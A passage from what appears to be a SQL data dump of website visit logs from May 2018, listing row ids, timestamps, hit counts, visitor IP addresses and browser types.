5568,1526385879,1,1,0,0,'91.196.177.46','chrome'),(245569,1526385910,1,1,0,0,'54.36.148.28','other'),(245570,1526385920,1,1,0,0,'54.36.149.42','other'),(245571,1526386106,2,2,0,0,'78.111.190.218','chrome'),(245572,1526386405,1,1,0,0,'37.55.74.210','chrome'),(245573,1526386913,1,1,0,0,'91.196.177.46','chrome'),(245574,1526387666,1,1,0,0,'217.69.134.154','other'),(245575,1526387732,1,1,0,0,'178.154.171.88','other'),(245576,1526387917,1,1,0,0,'95.132.49.185','firefox'),(245577,1526387919,1,1,0,0,'54.36.149.106','other'),(245578,1526388242,1,1,0,0,'54.36.148.198','other'),(245579,1526388566,1,1,0,0,'54.36.149.57','other'),(245580,1526388863,1,1,0,0,'217.69.133.9','other'),(245581,1526388914,1,1,0,0,'54.36.149.2','other'),(245582,1526389122,1,1,0,0,'54.36.149.0','other'),(245583,1526389256,1,1,0,0,'46.201.133.32','chrome'),(245584,1526389364,1,1,0,0,'54.36.148.210','other'),(245585,1526389391,1,1,0,0,'54.36.149.7','other'),(245586,1526389415,1,1,0,0,'8.29.198.26','other'),(245587,1526389826,1,1,0,0,'94.178.146.140','chrome'),(245588,1526389961,1,1,0,0,'54.36.148.20','other'),(245589,1526389982,1,1,0,0,'141.8.142.74','other'),(245590,1526390063,1,1,0,0,'54.36.148.49','other'),(245591,1526390067,1,1,0,0,'178.154.171.88','other'),(245592,1526390290,2,2,0,0,'91.196.178.161','chrome'),(245593,1526390394,1,1,0,0,'54.36.148.94','other'),(245594,1526390499,1,1,0,0,'54.36.148.244','other'),(245595,1526390620,1,1,0,0,'178.93.225.78','chrome'),(245596,1526390798,1,1,0,0,'37.9.113.182','other'),(245597,1526390917,1,1,0,0,'91.196.178.135','firefox'),(245598,1526390978,1,1,0,0,'54.36.148.82','other'),(245599,1526391516,1,1,0,0,'216.244.66.237','other'),(245600,1526391723,1,1,0,0,'54.36.148.94','other'),(245601,1526392611,1,1,0,0,'54.36.148.127','other'),(245602,1526392714,1,1,0,0,'178.154.171.88','other'),(245603,1526392975,1,1,0,0,'54.36.148.214','other'),(245604,1526393208,1,1,0,0,'54.36.148.113','other'),(245605,1526393308,1,1,0,0,'54.36.149.100','other'),(245606,1526393476,1,1,0,0,'46.161.9.39','firefox'),(245607,1526393635,1,1,0,0,'178.154.171.88','other'),(245608,1526393739,1,1,0,0,'54.36.148.159','other'),(245609,1526393892,2,2,0,0,'91.196.178.165','chrome'),(245610,1526394034,1,1,0,0,'54.36.149.94','other'),(245611,1526394057,1,1,0,0,'176.118.54.197','chrome'),(245612,1526394092,2,2,0,0,'91.196.178.169','chrome'),(245613,1526394195,1,1,0,0,'54.36.148.190','other'),(245614,1526394198,1,1,0,0,'35.226.23.240','other'),(245615,1526394294,1,1,0,0,'54.36.148.238','other'),(245616,1526394365,1,1,0,0,'8.29.198.27','other'),(245617,1526394466,1,1,0,0,'54.36.148.70','other'),(245618,1526394646,1,1,0,0,'54.36.148.93','other'),(245619,1526394872,1,1,0,0,'54.36.148.191','other'),(245620,1526394881,1,1,0,0,'54.36.148.177','other'),(245621,1526395000,1,1,0,0,'176.37.72.200','firefox'),(245622,1526395448,1,0,1,0,'66.249.69.39',''),(245623,1526396024,1,1,0,0,'188.230.43.254','other'),(245624,1526396035,1,1,0,0,'54.36.148.251','other'),(245625,1526396309,1,1,0,0,'54.36.148.122','other'),(245626,1526396704,1,0,1,0,'66.249.69.39',''),(245627,1526397354,1,1,0,0,'54.36.149.39','other'),(245628,1526397356,1,1,0,0,'178.95.92.13','chrome'),(245629,1526397395,1,1,0,0,'54.36.148.212','other'),(245630,1526397457,1,1,0,0,'54.36.148.221','other'),(245631,1526397531,1,1,0,0,'54.36.148.15','other'),(245632,1526397570,1,1,0,0,'54.36.149.52','other'),(245633,1526397917,1,1,0,0,'54.36.148.29','other'),(245634,1526398023,1,1,0,0,'54.36.149.64','other'),(245635,1526398274,1,1,0,0,'54.36.148.71','other'),(245636,1526398420,1,1,0,0,'188.230.43.254','other'),(245637,1526398432,1,1,0,0,'54.36.149.34','other'),(245638,1526398519,1,1,0,0,'207.46.13.137','other'),(245639,1526398726,1,1,0,0,'40.77.167.197','other'),(245640,1526399290,1,1,0,0,'217.69.133.194','other'),(245641,1526399497,1,1,0,0,'54.36.149.20','other'),(245642,1526399601,1,1,0,0,'54.36.148.82','other'),(245643,1526399673,2,2,0,0,'91.196.178.29','chrome'),(245644,1526399837,1,1,0,0,'54.36.148.222','other'),(245645,1526399869,1,1,0,0,'54.36.149.26','other'),(245646,1526400222,1,1,0,0,'54.36.148.84','other'),(245647,1526400236,1,1,0,0,'54.36.148.149','other'),(245648,1526400249,1,1,0,0,'8.29.198.27','other'),(245649,1526400276,2,2,0,0,'141.8.142.74','other'),(245650,1526400456,1,1,0,0,'54.36.148.138','other'),(245651,1526400614,1,1,0,0,'54.36.149.22','other'),(245652,1526400698,1,1,0,0,'217.69.133.6','other'),(245653,1526400821,1,1,0,0,'188.230.43.254','other'),(245654,1526401137,1,1,0,0,'54.36.148.115','other'),(245655,1526401173,1,1,0,0,'54.36.148.54','other'),(245656,1526401332,1,1,0,0,'54.36.148.35','other'),(245657,1526401567,3,3,0,0,'35.226.23.240','other'),(245658,1526401882,1,1,0,0,'54.36.148.219','other'),(245659,1526402590,2,2,0,0,'91.124.52.88','chrome'),(245660,1526402851,2,2,0,0,'54.165.59.7','other'),(245661,1526402908,1,1,0,0,'91.196.178.74','firefox'),(245662,1526403011,1,1,0,0,'54.36.148.166','other'),(245663,1526403158,1,1,0,0,'54.36.148.63','other'),(245664,1526403227,1,1,0,0,'188.230.43.254','other'),(245665,1526403355,1,1,0,0,'54.36.148.106','other'),(245666,1526403537,1,1,0,0,'54.36.149.4','other'),(245667,1526403576,1,1,0,0,'54.36.148.162','other'),(245668,1526403736,1,1,0,0,'54.36.148.178','other'),(245669,1526403798,1,1,0,0,'54.36.148.95','other'),(245670,1526403939,1,1,0,0,'54.36.148.218','other'),(245671,1526404302,1,1,0,0,'54.36.148.45','other'),(245672,1526404774,1,1,0,0,'54.36.148.122','other'),(245673,1526404865,1,1,0,0,'54.36.148.255','other'),(245674,1526405193,1,1,0,0,'8.29.198.27','other'),(245675,1526405213,1,1,0,0,'54.36.148.52','other'),(245676,1526405327,1,1,0,0,'216.244.66.237','other'),(245677,1526405363,1,1,0,0,'54.36.148.177','other'),(245678,1526405394,1,1,0,0,'54.36.148.156','other'),(245679,1526405447,1,1,0,0,'54.36.148.65','other'),(245680,1526405914,1,1,0,0,'46.133.203.148','chrome'),(245681,1526406038,1,1,0,0,'54.36.148.46','other'),(245682,1526406117,2,2,0,0,'178.92.84.197','chrome'),(245683,1526406429,1,1,0,0,'54.36.148.122','other'),(245684,1526406452,2,2,0,0,'91.196.178.50','chrome'),(245685,1526406532,1,1,0,0,'54.36.149.30','other'),(245686,1526406719,1,1,0,0,'46.161.9.39','firefox'),(245687,1526407473,1,1,0,0,'54.36.148.249','other'),(245688,1526407808,1,1,0,0,'91.209.11.236','other'),(245689,1526408452,1,1,0,0,'54.36.148.30','other'),(245690,1526408566,1,1,0,0,'54.36.149.44','other'),(245691,1526409241,1,1,0,0,'91.196.178.87','firefox'),(245692,1526409373,1,1,0,0,'54.36.149.64','other'),(245693,1526409459,1,1,0,0,'54.36.148.250','other'),(245694,1526409672,1,1,0,0,'54.36.148.141','other'),(245695,1526409856,1,1,0,0,'54.36.149.56','other'),(245696,1526410364,1,1,0,0,'54.36.148.225','other'),(245697,1526410551,1,1,0,0,'54.36.149.85','other'),(245698,1526411090,1,1,0,0,'8.29.198.27','other'),(245699,1526411360,1,1,0,0,'54.36.149.59','other'),(245700,1526411417,1,1,0,0,'54.36.148.207','other'),(245701,1526411936,1,1,0,0,'180.76.15.139','other'),(245702,1526412116,1,1,0,0,'54.36.149.39','other'),(245703,1526413259,1,1,0,0,'54.36.148.62','other'),(245704,1526413843,1,1,0,0,'54.36.148.137','other'),(245705,1526414175,2,2,0,0,'178.92.251.119','chrome'),(245706,1526414207,1,1,0,0,'54.36.149.17','other'),(245707,1526414729,1,1,0,0,'54.36.148.216','other'),(245708,1526414917,1,1,0,0,'54.36.148.223','other'),(245709,1526415359,1,1,0,0,'54.36.148.64','other'),(245710,1526415391,1,1,0,0,'54.36.148.131','other'),(245711,1526415435,1,1,0,0,'37.115.210.145','firefox'),(245712,1526415539,1,1,0,0,'54.36.148.163','other'),(245713,1526415727,1,1,0,0,'54.36.149.90','other'),(245714,1526416034,1,1,0,0,'8.29.198.25','other'),(245715,1526416704,1,1,0,0,'54.36.149.91','other'),(245716,1526416879,1,1,0,0,'54.36.148.144','other'),(245717,1526416886,1,1,0,0,'54.36.149.35','other'),(245718,1526416944,1,1,0,0,'54.36.148.22','other'),(245719,1526417012,1,1,0,0,'54.36.148.233','other'),(245720,1526417016,1,1,0,0,'54.36.148.79','other'),(245721,1526417306,1,1,0,0,'91.196.178.166','chrome'),(245722,1526417395,1,1,0,0,'54.36.148.136','other'),(245723,1526417430,1,1,0,0,'54.36.148.166','other'),(245724,1526417618,1,0,1,0,'66.249.69.39',''),(245725,1526418061,1,1,0,0,'54.36.148.43','other'),(245726,1526418112,1,1,0,0,'54.36.148.187','other'),(245727,1526418151,1,1,0,0,'54.36.148.161','other'),(245728,1526419639,1,1,0,0,'54.36.148.67','other'),(245729,1526419829,1,1,0,0,'54.36.149.10','other'),(245730,1526420044,1,1,0,0,'54.36.148.14','other'),(245731,1526420142,1,1,0,0,'54.36.148.113','other'),(245732,1526420420,1,1,0,0,'54.36.148.178','other'),(245733,1526420601,1,1,0,0,'54.36.148.226','other'),(245734,1526420671,1,1,0,0,'54.36.148.58','other'),(245735,1526420842,1,1,0,0,'54.36.148.231','other'),(245736,1526421240,1,0,1,0,'66.249.69.39',''),(245737,1526421291,1,1,0,0,'54.36.148.253','other'),(245738,1526421578,1,1,0,0,'93.188.39.163','chrome'),(245739,1526421581,1,1,0,0,'54.36.148.137','other'),(245740,1526421768,1,1,0,0,'54.36.149.66','other'),(245741,1526421927,1,1,0,0,'8.29.198.27','other'),(245742,1526422275,1,1,0,0,'54.36.148.248','other'),(245743,1526422568,1,1,0,0,'157.55.39.126','other'),(245744,1526423022,1,0,1,0,'66.249.69.35',''),(245745,1526423245,1,1,0,0,'54.36.148.190','other'),(245746,1526423293,1,1,0,0,'54.36.148.249','other'),(245747,1526423749,1,1,0,0,'54.36.148.206','other'),(245748,1526424013,1,1,0,0,'54.36.148.135','other'),(245749,1526424103,1,1,0,0,'54.36.148.94','other'),(245750,1526424131,1,1,0,0,'54.36.148.69','other'),(245751,1526424146,1,1,0,0,'54.36.149.45','other'),(245752,1526424635,1,1,0,0,'54.36.148.184','other'),(245753,1526424994,1,1,0,0,'54.36.148.123','other'),(245754,1526425176,1,1,0,0,'54.36.148.97','other'),(245755,1526425568,1,1,0,0,'54.36.148.95','other'),(245756,1526425665,1,1,0,0,'54.36.148.192','other'),(245757,1526426088,1,1,0,0,'217.69.133.6','other'),(245758,1526426209,1,1,0,0,'54.36.149.38','other'),(245759,1526426279,1,1,0,0,'54.36.148.22','other'),(245760,1526426623,1,1,0,0,'207.46.13.49','other'),(245761,1526426705,1,1,0,0,'54.36.148.174','other'),(245762,1526426870,1,1,0,0,'8.29.198.26','other'),(245763,1526427553,1,1,0,0,'207.46.13.91','other'),(245764,1526427875,1,1,0,0,'54.36.148.117','other'),(245765,1526429211,1,1,0,0,'54.36.148.232','other'),(245766,1526429235,1,1,0,0,'54.36.148.164','other'),(245767,1526429261,1,1,0,0,'54.36.148.88','other'),(245768,1526430013,1,1,0,0,'128.72.81.25','msie'),(245769,1526430289,1,1,0,0,'54.36.149.23','other'),(245770,1526430506,1,1,0,0,'13.56.232.243','chrome'),(245771,1526430904,1,1,0,0,'54.36.148.185','other'),(245772,1526430920,1,1,0,0,'54.36.149.76','other'),(245773,1526431015,1,1,0,0,'54.36.148.132','other'),(245774,1526431665,1,1,0,0,'54.36.149.93','other'),(245775,1526432347,1,1,0,0,'54.36.148.145','other'),(245776,1526432556,1,0,1,0,'66.249.69.39',''),(245777,1526432575,1,1,0,0,'54.36.148.50','other'),(245778,1526432591,1,1,0,0,'54.36.148.237','other'),(245779,1526432671,1,1,0,0,'54.36.148.75','other'),(245780,1526432758,1,1,0,0,'8.29.198.26','other'),(245781,1526433165,1,1,0,0,'216.244.66.237','other'),(245782,1526433248,1,1,0,0,'54.36.148.86','other'),(245783,1526433341,1,1,0,0,'207.46.13.90','other'),(245784,1526433344,1,0,1,0,'66.249.69.35',''),(245785,1526433515,1,1,0,0,'207.46.13.49','other'),(245786,1526433517,1,1,0,0,'54.36.149.53','other'),(245787,1526433912,1,1,0,0,'54.36.148.143','other'),(245788,1526434412,1,1,0,0,'54.36.149.84','other'),(245789,1526435168,1,0,1,0,'66.249.69.35',''),(245790,1526435761,1,1,0,0,'54.36.149.40','other'),(245791,1526435912,1,1,0,0,'54.36.148.76','other'),(245792,1526435993,1,1,0,0,'54.36.149.54','other'),(245793,1526436282,1,1,0,0,'54.36.149.48','other'),(245794,1526436293,1,1,0,0,'54.36.149.75','other'),(245795,1526436504,1,1,0,0,'54.36.149.15','other'),(245796,1526436729,1,1,0,0,'54.36.148.187','other'),(245797,1526436782,1,1,0,0,'54.36.149.44','other'),(245798,1526436843,1,1,0,0,'93.188.39.163','firefox'),(245799,1526436986,1,1,0,0,'54.36.149.76','other'),(245800,1526437047,1,1,0,0,'157.55.39.126','other'),(245801,1526437165,1,1,0,0,'54.36.149.102','other'),(245802,1526437385,1,1,0,0,'54.36.148.174','other'),(245803,1526437697,1,1,0,0,'8.29.198.27','other'),(245804,1526437834,1,1,0,0,'54.36.148.145','other'),(245805,1526438199,1,1,0,0,'66.249.75.29','chrome'),(245806,1526438577,1,1,0,0,'54.36.148.222','other'),(245807,1526438903,1,1,0,0,'54.36.148.211','other'),(245808,1526439057,1,1,0,0,'54.36.148.178','other'),(245809,1526439379,1,1,0,0,'207.46.13.227','other'),(245810,1526439417,1,1,0,0,'54.36.149.102','other'),(245811,1526439570,1,1,0,0,'54.36.148.12','other'),(245812,1526439808,1,0,1,0,'66.249.75.29',''),(245813,1526439958,1,0,1,0,'66.249.69.41',''),(245814,1526440077,1,1,0,0,'54.36.149.38','other'),(245815,1526440120,1,1,0,0,'54.232.213.248','chrome'),(245816,1526440141,1,1,0,0,'54.36.148.80','other'),(245817,1526440164,1,1,0,0,'54.36.148.241','other'),(245818,1526440325,1,1,0,0,'207.46.13.227','other'),(245819,1526440437,1,1,0,0,'54.36.149.33','other'),(245820,1526440603,1,1,0,0,'54.36.148.225','other'),(245821,1526441568,1,1,0,0,'54.36.148.88','other'),(245822,1526441757,1,0,1,0,'66.249.69.41',''),(245823,1526441996,1,1,0,0,'54.36.148.27','other'),(245824,1526442138,1,1,0,0,'54.36.148.24','other'),(245825,1526442221,1,1,0,0,'157.55.39.199','other'),(245826,1526442345,1,1,0,0,'54.36.148.70','other'),(245827,1526442895,1,1,0,0,'54.36.148.135','other'),(245828,1526443158,1,1,0,0,'54.36.149.17','other'),(245829,1526443315,1,1,0,0,'178.154.171.88','other'),(245830,1526443332,1,1,0,0,'54.36.149.60','other'),(245831,1526443596,1,1,0,0,'8.29.198.26','other'),(245832,1526443811,1,1,0,0,'54.36.149.31','other'),(245833,1526443913,1,1,0,0,'54.36.148.103','other'),(245834,1526444106,1,1,0,0,'54.36.149.55','other'),(245835,1526444726,1,1,0,0,'91.209.11.236','other'),(245836,1526445115,1,1,0,0,'54.36.148.212','other'),(245837,1526445122,1,1,0,0,'54.36.148.51','other'),(245838,1526445210,1,1,0,0,'157.55.39.197','other'),(245839,1526445417,1,1,0,0,'54.36.149.53','other'),(245840,1526445589,1,1,0,0,'54.36.149.59','other'),(245841,1526445794,18,18,0,0,'144.76.110.229','other'),(245842,1526446036,1,1,0,0,'54.36.149.76','other'),(245843,1526446196,1,1,0,0,'54.36.149.39','other'),(245844,1526446516,1,1,0,0,'54.36.148.47','other'),(245845,1526446704,1,1,0,0,'180.76.15.6','other'),(245846,1526446782,1,1,0,0,'120.77.159.175','other'),(245847,1526446785,2,2,0,0,'37.54.22.95','firefox'),(245848,1526447173,1,1,0,0,'87.250.224.46','other'),(245849,1526447280,1,1,0,0,'54.36.149.77','other'),(245850,1526447492,1,1,0,0,'54.36.148.64','other'),(245851,1526447577,1,1,0,0,'37.9.113.182','other'),(245852,1526447663,1,1,0,0,'54.36.149.57','other'),(245853,1526447742,1,1,0,0,'178.154.171.88','other'),(245854,1526448198,1,1,0,0,'46.201.250.174','chrome'),(245855,1526448349,1,0,1,0,'66.249.69.41',''),(245856,1526448403,1,1,0,0,'54.36.148.226','other'),(245857,1526448416,1,1,0,0,'54.36.149.63','other'),(245858,1526448494,1,1,0,0,'54.36.148.97','other'),(245859,1526448527,1,1,0,0,'8.29.198.27','other'),(245860,1526448745,2,2,0,0,'66.249.75.30','chrome'),(245861,1526448934,3,3,0,0,'91.196.177.46','chrome'),(245862,1526449038,1,1,0,0,'37.9.113.182','other'),(245863,1526449161,1,1,0,0,'54.36.148.204','other'),(245864,1526449478,1,1,0,0,'54.36.148.106','other'),(245865,1526449503,1,1,0,0,'54.36.148.15','other'),(245866,1526449524,1,1,0,0,'54.36.148.99','other'),(245867,1526449651,1,1,0,0,'178.154.171.88','other'),(245868,1526449857,1,1,0,0,'54.36.148.246','other'),(245869,1526450019,1,1,0,0,'54.36.148.43','other'),(245870,1526450038,1,1,0,0,'54.36.148.35','other'),(245871,1526450090,1,1,0,0,'54.36.149.37','other'),(245872,1526450408,2,2,0,0,'141.8.142.74','other'),(245873,1526450456,1,0,1,0,'66.249.64.29',''),(245874,1526450533,1,1,0,0,'54.36.148.112','other'),(245875,1526450675,1,1,0,0,'95.132.63.154','firefox'),(245876,1526450829,1,1,0,0,'54.36.148.135','other'),(245877,1526451059,1,0,1,0,'66.249.64.28',''),(245878,1526451309,1,1,0,0,'54.36.149.93','other'),(245879,1526451392,1,1,0,0,'178.255.215.94','other'),(245880,1526451441,1,1,0,0,'54.36.149.92','other'),(245881,1526451457,1,1,0,0,'91.124.1.167','chrome'),(245882,1526451734,1,1,0,0,'54.36.149.18','other'),(245883,1526451921,1,1,0,0,'37.52.136.214','chrome'),(245884,1526452124,2,2,0,0,'54.36.148.220','other'),(245885,1526452421,1,1,0,0,'146.185.157.243','chrome'),(245886,1526452506,1,1,0,0,'91.196.178.82','firefox'),(245887,1526452540,1,1,0,0,'54.36.149.24','other'),(245888,1526452728,3,3,0,0,'91.196.178.94','chrome'),(245889,1526452801,2,2,0,0,'91.196.178.169','chrome'),(245890,1526453064,1,1,0,0,'54.36.149.54','other'),(245891,1526453331,1,1,0,0,'54.36.149.36','other'),(245892,1526453380,1,1,0,0,'54.36.148.12','other'),(245893,1526453460,1,1,0,0,'54.36.148.112','other'),(245894,1526453588,1,1,0,0,'35.226.23.240','other'),(245895,1526453714,1,1,0,0,'54.36.148.157','other'),(245896,1526453890,2,2,0,0,'178.154.171.88','other'),(245897,1526453969,2,2,0,0,'82.207.44.253','firefox'),(245898,1526454131,1,1,0,0,'141.8.142.74','other'),(245899,1526454199,1,1,0,0,'54.36.148.148','other'),(245900,1526454321,1,1,0,0,'95.132.63.154','firefox'),(245901,1526454391,1,1,0,0,'54.36.149.103','other'),(245902,1526454422,1,1,0,0,'8.29.198.25','other'),(245903,1526454525,1,1,0,0,'216.244.66.237','other'),(245904,1526454555,1,1,0,0,'130.180.210.97','chrome'),(245905,1526454786,2,2,0,0,'91.196.178.94','chrome'),(245906,1526454961,2,2,0,0,'91.196.178.81','chrome'),(245907,1526455196,1,1,0,0,'91.196.178.133','chrome'),(245908,1526455318,1,1,0,0,'54.36.149.106','other'),(245909,1526455632,1,1,0,0,'54.36.148.158','other'),(245910,1526455709,1,1,0,0,'54.36.149.18','other'),(245911,1526455882,1,1,0,0,'195.162.71.207','chrome'),(245912,1526455974,1,1,0,0,'54.36.149.107','other'),(245913,1526455989,1,1,0,0,'54.36.148.240','other'),(245914,1526456056,1,1,0,0,'54.36.148.45','other'),(245915,1526456391,1,1,0,0,'54.36.148.177','other'),(245916,1526456399,1,1,0,0,'35.226.23.240','other'),(245917,1526456431,1,1,0,0,'54.36.148.29','other'),(245918,1526456437,1,1,0,0,'54.36.148.159','other'),(245919,1526456726,1,1,0,0,'54.36.148.248','other'),(245920,1526456730,1,1,0,0,'54.36.148.103','other'),(245921,1526456846,1,1,0,0,'82.207.64.187','chrome'),(245922,1526456922,1,1,0,0,'54.36.148.176','other'),(245923,1526456968,3,3,0,0,'130.180.217.167','chrome'),(245924,1526456982,1,1,0,0,'91.196.178.133','chrome'),(245925,1526457372,1,1,0,0,'54.36.148.216','other'),(245926,1526457823,1,1,0,0,'54.36.149.21','other'),(245927,1526457832,1,1,0,0,'217.69.134.154','other'),(245928,1526457884,5,5,0,0,'91.196.178.94','chrome'),(245929,1526457928,1,1,0,0,'195.162.71.207','chrome'),(245930,1526458219,1,1,0,0,'54.36.148.77','other'),(245931,1526458493,1,1,0,0,'54.36.149.72','other'),(245932,1526458633,1,1,0,0,'218.66.74.73','other'),(245933,1526458874,1,1,0,0,'54.36.148.244','other'),(245934,1526458914,1,1,0,0,'54.36.148.182','other'),(245935,1526458917,2,2,0,0,'165.227.128.159','chrome'),(245936,1526459069,1,1,0,0,'54.36.148.23','other'),(245937,1526459339,1,1,0,0,'54.36.148.115','other'),(245938,1526459352,1,1,0,0,'8.29.198.25','other'),(245939,1526459597,1,1,0,0,'54.36.149.32','other'),(245940,1526459617,1,1,0,0,'141.8.142.74','other'),(245941,1526459666,1,1,0,0,'157.55.39.197','other'),(245942,1526459722,1,1,0,0,'54.36.149.73','other'),(245943,1526460088,1,1,0,0,'91.200.124.243','firefox'),(245944,1526460303,1,1,0,0,'180.76.15.21','other'),(245945,1526460955,1,1,0,0,'54.36.148.115','other'),(245946,1526461210,1,1,0,0,'87.228.18.98','msie'),(245947,1526461227,1,1,0,0,'217.69.133.203','other'),(245948,1526461601,1,1,0,0,'54.36.149.36','other'),(245949,1526461648,1,1,0,0,'54.36.148.116','other'),(245950,1526461836,1,1,0,0,'54.36.148.118','other'),(245951,1526461945,1,1,0,0,'217.69.133.4','other'),(245952,1526462016,1,1,0,0,'178.154.171.88','other'),(245953,1526462140,1,1,0,0,'54.36.149.103','other'),(245954,1526462208,1,1,0,0,'193.93.218.146','other'),(245955,1526462257,1,1,0,0,'54.36.149.68','other'),(245956,1526462539,1,1,0,0,'54.36.148.145','other'),(245957,1526462745,1,1,0,0,'54.36.148.137','other'),(245958,1526462874,1,1,0,0,'217.69.133.4','other'),(245959,1526462975,1,1,0,0,'54.36.149.42','other'),(245960,1526463002,1,1,0,0,'54.36.149.105','other'),(245961,1526463390,1,0,1,0,'66.249.64.30',''),(245962,1526463393,1,1,0,0,'54.36.149.79','other'),(245963,1526463411,1,1,0,0,'54.36.148.171','other'),(245964,1526463456,1,1,0,0,'54.36.148.113','other'),(245965,1526463646,1,1,0,0,'91.196.178.132','firefox'),(245966,1526463724,1,1,0,0,'37.9.113.115','other'),(245967,1526463985,3,3,0,0,'91.196.178.89','chrome'),(245968,1526464137,1,1,0,0,'54.36.148.29','other'),(245969,1526464288,1,0,1,0,'66.249.64.28',''),(245970,1526464467,1,1,0,0,'54.36.148.67','other'),(245971,1526464763,1,1,0,0,'54.36.149.12','other'),(245972,1526464926,1,1,0,0,'218.66.74.73','other'),(245973,1526465048,1,0,1,0,'66.249.64.29',''),(245974,1526465249,1,1,0,0,'95.134.220.86','firefox'),(245975,1526465252,1,1,0,0,'8.29.198.25','other'),(245976,1526466006,1,1,0,0,'54.36.148.16','other'),(245977,1526466020,1,1,0,0,'54.36.148.136','other'),(245978,1526466176,1,1,0,0,'40.77.167.170','other'),(245979,1526466487,1,1,0,0,'54.36.148.152','other'),(245980,1526466539,1,1,0,0,'54.36.148.31','other'),(245981,1526466717,1,1,0,0,'54.36.148.83','other'),(245982,1526466771,1,1,0,0,'157.55.39.199','other'),(245983,1526466919,1,1,0,0,'54.36.149.33','other'),(245984,1526467074,1,1,0,0,'54.36.149.93','other'),(245985,1526467081,2,2,0,0,'54.36.148.125','other'),(245986,1526467377,1,1,0,0,'54.36.148.164','other'),(245987,1526467814,1,1,0,0,'54.36.148.117','other'),(245988,1526467919,1,1,0,0,'46.161.9.39','firefox'),(245989,1526468093,1,1,0,0,'94.45.48.102','chrome'),(245990,1526468143,1,1,0,0,'54.36.148.89','other'),(245991,1526468180,2,2,0,0,'178.154.171.88','other'),(245992,1526468288,1,1,0,0,'91.124.187.99','chrome'),(245993,1526468447,1,1,0,0,'54.36.148.20','other'),(245994,1526468583,1,1,0,0,'54.36.149.52','other'),(245995,1526468676,1,1,0,0,'193.106.30.99','firefox'),(245996,1526468942,1,1,0,0,'91.196.178.132','firefox'),(245997,1526468962,1,1,0,0,'92.112.210.246','chrome'),(245998,1526469217,1,1,0,0,'54.36.148.253','other'),(245999,1526469440,1,1,0,0,'54.36.148.45','other'),(246000,1526469513,2,2,0,0,'92.112.125.243','chrome'),(246001,1526469583,2,2,0,0,'91.196.178.94','chrome'),(246002,1526469738,1,1,0,0,'54.36.149.53','other'),(246003,1526469816,1,1,0,0,'162.210.196.100','other'),(246004,1526470159,1,1,0,0,'54.36.148.200','other'),(246005,1526470187,1,1,0,0,'8.29.198.26','other'),(246006,1526470324,1,1,0,0,'54.36.148.190','other'),(246007,1526470386,1,1,0,0,'54.36.148.117','other'),(246008,1526470710,1,1,0,0,'46.185.73.7','chrome'),(246009,1526470742,1,1,0,0,'178.154.171.88','other'),(246010,1526470792,1,1,0,0,'54.36.148.135','other'),(246011,1526471143,1,1,0,0,'54.36.149.8','other'),(246012,1526471291,1,1,0,0,'54.36.148.222','other'),(246013,1526471422,1,1,0,0,'54.36.148.195','other'),(246014,1526471435,1,1,0,0,'54.36.149.106','other'),(246015,1526471447,1,1,0,0,'188.230.43.254','other'),(246016,1526471516,1,1,0,0,'54.36.148.94','other'),(246017,1526471536,1,1,0,0,'54.36.148.67','other'),(246018,1526471728,1,1,0,0,'54.36.148.162','other'),(246019,1526472252,1,1,0,0,'46.211.27.233','chrome'),(246020,1526472363,1,1,0,0,'193.93.218.146','other'),(246021,1526472468,1,1,0,0,'54.36.148.238','other'),(246022,1526472510,1,0,1,0,'66.249.64.30',''),(246023,1526472513,1,1,0,0,'54.36.149.103','other'),(246024,1526472595,1,1,0,0,'54.36.148.159','other'),(246025,1526472916,1,1,0,0,'54.36.149.16','other'),(246026,1526473051,1,1,0,0,'82.207.64.187','chrome'),(246027,1526473138,1,1,0,0,'54.36.149.84','other'),(246028,1526473143,1,1,0,0,'141.8.142.74','other'),(246029,1526473306,1,0,1,0,'66.249.64.29',''),(246030,1526473731,1,1,0,0,'54.36.149.2','other'),(246031,1526473757,2,2,0,0,'91.124.187.99','chrome'),(246032,1526473771,1,1,0,0,'54.36.148.135','other'),(246033,1526473865,1,1,0,0,'54.36.148.156','other'),(246034,1526474059,1,1,0,0,'54.36.148.77','other'),(246035,1526474083,1,1,0,0,'54.36.148.17','other'),(246036,1526474173,1,1,0,0,'91.124.1.167','chrome'),(246037,1526474379,1,1,0,0,'54.36.149.62','other'),(246038,1526474627,1,1,0,0,'54.36.148.133','other'),(246039,1526474718,1,1,0,0,'54.36.149.59','other'),(246040,1526475109,1,0,1,0,'66.249.64.29',''),(246041,1526475194,2,2,0,0,'82.207.121.233','chrome'),(246042,1526475287,1,1,0,0,'141.8.142.74','other'),(246043,1526475509,1,1,0,0,'178.154.171.88','other'),(246044,1526475621,4,4,0,0,'91.196.178.94','chrome'),(246045,1526475994,1,1,0,0,'54.36.148.204','other'),(246046,1526476000,1,1,0,0,'54.36.148.196','other'),(246047,1526476066,2,2,0,0,'46.182.86.98','chrome'),(246048,1526476082,1,1,0,0,'8.29.198.27','other'),(246049,1526476158,1,1,0,0,'54.36.148.171','other'),(246050,1526476174,1,1,0,0,'54.36.148.75','other'),(246051,1526476257,1,1,0,0,'213.111.232.154','chrome'),(246052,1526476438,1,1,0,0,'141.8.142.74','other'),(246053,1526476499,1,1,0,0,'37.9.113.182','other'),(246054,1526476767,2,2,0,0,'91.196.178.94','chrome'),(246055,1526477073,1,1,0,0,'54.36.148.41','other'),(246056,1526477185,1,1,0,0,'54.36.148.113','other'),(246057,1526477274,1,1,0,0,'216.244.66.237','other'),(246058,1526477417,1,1,0,0,'141.8.142.74','other'),(246059,1526477480,1,1,0,0,'178.154.171.88','other'),(246060,1526477649,1,1,0,0,'95.132.63.154','firefox'),(246061,1526477691,1,1,0,0,'54.36.148.165','other'),(246062,1526477697,1,1,0,0,'54.36.148.33','other'),(246063,1526477789,1,1,0,0,'54.36.148.161','other'),(246064,1526478013,1,1,0,0,'54.36.149.80','other'),(246065,1526478348,1,1,0,0,'141.8.142.74','other'),(246066,1526478390,1,1,0,0,'91.196.178.131','firefox'),(246067,1526478418,1,1,0,0,'54.36.148.250','other'),(246068,1526478446,1,1,0,0,'54.36.148.155','other'),(246069,1526478694,1,1,0,0,'54.36.148.222','other'),(246070,1526478725,1,1,0,0,'37.52.3.0','chrome'),(246071,1526478783,1,1,0,0,'54.36.148.214','other'),(246072,1526478971,1,0,1,0,'66.249.64.28',''),(246073,1526479418,1,1,0,0,'178.154.171.88','other'),(246074,1526479423,4,4,0,0,'141.8.142.74','other'),(246075,1526479627,1,1,0,0,'217.65.253.175','chrome'),(246076,1526479628,1,1,0,0,'62.80.184.250','chrome'),(246077,1526479878,1,1,0,0,'54.36.148.67','other'),(246078,1526480003,1,1,0,0,'54.36.148.38','other'),(246079,1526480095,1,1,0,0,'54.36.148.189','other'),(246080,152648